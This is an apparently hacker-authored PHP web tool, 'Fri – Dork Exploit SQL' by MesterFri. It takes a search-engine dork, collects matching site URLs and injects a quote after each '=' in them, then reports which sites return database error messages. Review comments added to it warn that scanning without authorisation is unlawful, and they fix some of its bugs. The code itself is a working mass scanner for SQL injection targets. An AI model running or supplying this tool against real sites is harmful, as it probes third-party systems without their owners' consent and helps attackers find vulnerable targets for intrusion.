Script Scanner dork SQLi >> Exploit by MesterFri
<!--
##############
# MesterFri #
##############
//-->
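<?php
/*
 * Dork-driven SQL-error scanner: the request handler at the bottom of this file
 * pulls URLs from a search engine and probes each one for database error text.
 *
 * SECURITY / LEGAL NOTE (review): this page fetches third-party hosts and sends
 * them a modified (quote-injected) request. Doing that against systems you are
 * not authorised to test is unlawful in most jurisdictions; run it only inside an
 * agreed engagement scope. The page itself has no authentication and no CSRF
 * token on its form, so never expose it on a network you do not control.
 */
set_time_limit(0);               // a full scan runs for a long time; disable the script timeout
ini_set('memory_limit', '64M');
// NOTE(review): the HTML comment emitted above the <?php tag is already output at
// this point, so header() only takes effect if output buffering is enabled in php.ini.
header('Content-Type: text/html; charset=UTF-8');

/*
 * Error signatures: a probed page whose body contains any of these (matched
 * case-insensitively as a regex alternation in check_injection()) is reported as
 * a hit. Duplicate entries from the original list (getimagesize, mysql_result)
 * were removed; they added nothing to the alternation.
 */
$error = array(
    'You have an error in your SQL',
    'supplied argument is not a valid MySQL result resource in',
    'Division by zero in',
    'Call to a member function',
    'Microsoft JET Database',
    'ODBC Microsoft Access Driver',
    'Microsoft OLE DB Provider for SQL Server',
    'Unclosed quotation mark',
    'Microsoft OLE DB Provider for Oracle',
    'Incorrect syntax near',
    'SQL query failed',
    'Warning mysql_fetch_assoc()',
    'Warning mysql_fetch_array()',
    'Warning session_start()',
    'Warning getimagesize()',
    'Warning is_writable()',
    'Warning Unknown()',
    'Warning mysql_result()',
    'Warning pg_exec()',
    'Warning mysql_num_rows()',
    'Warning mysql_query()',
    'Warning array_merge()',
    'Warning preg_match()',
    'Warning filesize()',
    'Warning require()',
);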
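/**
 * Push pending output to the client so the result list streams while the scan runs.
 *
 * ob_flush() raises a notice when no user-level output buffer is active (CLI, or
 * output_buffering=Off), so only flush a buffer that actually exists; flush() is
 * always safe.
 */
function letItBy(){
    if (ob_get_level() > 0) {
        ob_flush();
    }
    flush();
}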
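/**
 * Fetch one page of results from the legacy Google AJAX Web Search API.
 *
 * @param string $query  search expression (the "dork")
 * @param int    $page   1-based page number
 * @return array|false   list of result rows (the caller reads 'unescapedUrl' and
 *                       'titleNoFormatting'), or false on a non-200 API status or
 *                       an empty result set
 *
 * Dies (with the request URL, HTML-escaped) when the response is not the JSON
 * envelope this function understands.
 *
 * NOTE(review): ajax.googleapis.com/ajax/services/search/web was switched off by
 * Google long ago; expect the die() branch below unless the endpoint is replaced.
 * Fix vs. the original: page 1 used to start at offset 8 ($page * 8), silently
 * skipping the first page of results; the offset is now ($page - 1) * 8.
 */
function google_that($query, $page = 1){
    $resultPerPage = 8; // max result per page is 8 (GOOGLE rules)
    $start = ($page - 1) * $resultPerPage;
    $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);

    $raw = http_get($url, true);
    $resultFromGoogle = ($raw === false) ? null : json_decode($raw, true);

    if (!is_array($resultFromGoogle) || !isset($resultFromGoogle['responseStatus'])) {
        // Not the expected envelope (transport failure, HTML error page, retired API).
        // $url embeds the user's query, so escape it before echoing.
        die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8'));
    }

    if ((int)$resultFromGoogle['responseStatus'] !== 200) {
        return false;
    }

    $results = isset($resultFromGoogle['responseData']['results'])
        ? $resultFromGoogle['responseData']['results']
        : array();

    // An empty page means the search engine is out of results; signal that with false.
    return (is_array($results) && count($results) > 0) ? $results : false;
}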
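/**
 * Fetch a URL with curl and return the response body, or false on failure.
 *
 * @param string $url
 * @param bool   $safemode  when true, sleep one second first to stay under the
 *                          search engine's rate limit
 * @return string|false
 *
 * Fixes vs. the original: the handle is now actually closed (the old
 * `curl_close();` sat after `return` and had no argument, so it never ran and
 * would have been an error if it had); redirects are capped; and both the initial
 * request and any redirect are restricted to http/https, so a hostile search
 * result or Location header cannot steer this server into file://, gopher:// or
 * other schemes curl supports. A total timeout stops a slow target from stalling
 * the whole scan.
 */
function http_get($url, $safemode = false){
    if ($safemode === true) sleep(1); // safe mode, i dont want GOOGLE ban me..
    $im = curl_init($url);
    if ($im === false) {
        return false;
    }
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_TIMEOUT, 30);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_MAXREDIRS, 5);
    curl_setopt($im, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($im, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($im, CURLOPT_HEADER, 0);
    $body = curl_exec($im);
    curl_close($im);
    return $body;
}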
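/**
 * Probe one URL: replace every "=" with "='", fetch the page, and report whether
 * the body contains any signature from $GLOBALS['error'].
 *
 * @param string $url  URL taken from a search result
 * @return int|false   preg_match()'s result: 1 on a hit, 0 on none, false on a
 *                     regex engine error
 *
 * Fix vs. the original: each signature is preg_quote()d before being joined.
 * Entries such as 'Warning mysql_query()' were previously embedded verbatim, so
 * their "()" became an empty capture group rather than literal parentheses, and
 * any future entry containing ".", "|" or "#" would have changed the pattern's
 * meaning (or broken the "#" delimiter).
 *
 * NOTE(review): str_replace() rewrites every "=" in the URL, not only the
 * query-string separators (e.g. one inside a path segment or fragment); kept as-is
 * so the probe matches the original tool's behaviour.
 */
function check_injection($url){
    $data = http_get( str_replace("=", "='", $url) );
    if ($data === false || $data === '') {
        return 0; // nothing fetched, nothing to match
    }

    $quoted = array();
    foreach ($GLOBALS['error'] as $signature) {
        $quoted[] = preg_quote($signature, '#');
    }
    return preg_match('#' . implode('|', $quoted) . '#i', $data);
}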
?>
<!DOCTYPE html>
<html>
<head>
<meta name="Content-Type" content="text/html; charset=UTF-8">
<title>SQL Exploit</title>
<style type="text/css">
body{ background-color:black ; font: normal 5px Times New Roman; color:red;}
input{ border-width:5px; padding:8px; width:300px; }
a{ text-decoration:none; color:black;}
#button{ width:63px;}
#result{margin:20px;}
#result span{display:block;}
#result .Y{background-color:blue;}
#result .X{background-color:;}
</style>
</head>
<body>
<style>
body{
font-family: "Times New Roman", cursive;
background-color: #000000;
text-shadow:0px 0px 1px #FF0000;
}
table{
border: 1px #FF0000;
}
input,select,textarea{
border: 1px #00ff00 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
<center><h1><font color="Lime" face="Times New Roman" size="+4">F</font><font color="Lime" face="Times New Roman" size="+2">ri&nbsp;</font><font color="Lime" face="Times New Roman" size="+4">&nbsp;-&nbsp;D</font><font color="Lime" face="Times New Roman" size="+2">ork&nbsp;</font><font color="lime" face="Times New Roman" size="+4">E</font><font color="lime" face="Times New Roman" size="+2">xploit</font><font color="blue" face="Times New Roman" size="+4">&nbsp;SQL</font><br><br>
<center> <form method="post">
<slect onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;"><!-- developed by Afla-Youssef Don't remove Copyright pleass -->
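<input type="text" id="dork" name="dork" style="background-color: black; color: red; font-size: 15px; font-family: courier new;" value="<?php /* `$_POST['dork']{0}` is a parse error on PHP 8 (curly-brace string offsets were removed); also ignore array input (dork[]=...) which would warn inside the escaper */ echo (isset($_POST['dork']) && is_string($_POST['dork']) && $_POST['dork'] !== '') ? htmlspecialchars($_POST['dork'], ENT_QUOTES, 'UTF-8') : 'inurl:php?id='; ?>" />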
<br>
<input type="submit" value="Start" id="button" style="background-color: black; color: blue; font-size: 15px; font-family:Times New Roman;" onclick="show_alert();"/>
<script>
function show_alert()
{
alert(" Exploit Dork Start ^_^");
}
</script>
</form></center>
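<?php
/*
 * Request handler: on POST, walk the search-engine pages for the submitted dork
 * and probe every result URL with check_injection(), streaming one <span> per URL
 * (class "Y" = signature matched, "X" = no match).
 *
 * Fixes vs. the original:
 *  - `$_POST['dork']{0}` is a parse error on PHP 8; the check is now explicit and
 *    also rejects array input.
 *  - 'unescapedUrl' and 'titleNoFormatting' are controlled by whoever owns the
 *    result page. They were echoed raw into an href and into the link text, so a
 *    crafted page title (or a javascript: URL) could run script in the operator's
 *    browser when the results render. Both are HTML-escaped now, only http(s)
 *    targets become clickable or get probed, and rel="noopener noreferrer" keeps
 *    the opened tab from reaching back to this page or learning its URL.
 *
 * NOTE(review): there is still no CSRF token and no authentication on the form,
 * so any site the operator visits could trigger a scan through their browser.
 */
if (isset($_POST['dork']) && is_string($_POST['dork']) && $_POST['dork'] !== '') {
    echo '<div id="result"><center> Search... MesterFri</center><br>';
    letItBy();

    for ($googlePage = 1; $googlePage <= 10000; $googlePage++) {
        $googleResult = google_that($_POST['dork'], $googlePage);
        if (!$googleResult) {
            echo '<center>google dont heve more result, so I done..(?)</center>';
            break;
        }

        foreach ($googleResult as $hit) {
            $target = isset($hit['unescapedUrl']) ? (string)$hit['unescapedUrl'] : '';
            $title  = isset($hit['titleNoFormatting']) ? (string)$hit['titleNoFormatting'] : $target;

            // Only http(s) results are probed and linked; anything else (javascript:,
            // data:, empty) is rendered as an inert "#" link and never fetched.
            $isHttp    = preg_match('#^https?://#i', $target) === 1;
            $safeHref  = $isHttp ? htmlspecialchars($target, ENT_QUOTES, 'UTF-8') : '#';
            $safeTitle = htmlspecialchars($title, ENT_QUOTES, 'UTF-8');

            $vulnerable = $isHttp && check_injection($target);
            echo $vulnerable ? '<span class="Y">' : '<span class="X">';
            // file_put_contents("log.txt", "{$target}\n");
            echo "<a href=\"{$safeHref}\" target='_blank' rel=\"noopener noreferrer\">{$safeTitle}</a></span>\n";
            letItBy();
        }
    }

    echo '</div>';
}
?>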
<center><font color="blue" face="Times New Roman" size="+2">M</font><font color="blue" face="Times New Roman">ester</font><font color="blue" face="Times New Roman" size="+2">F</font><font color="blue" face="Times New Roman">ri</font>
</body>
</html>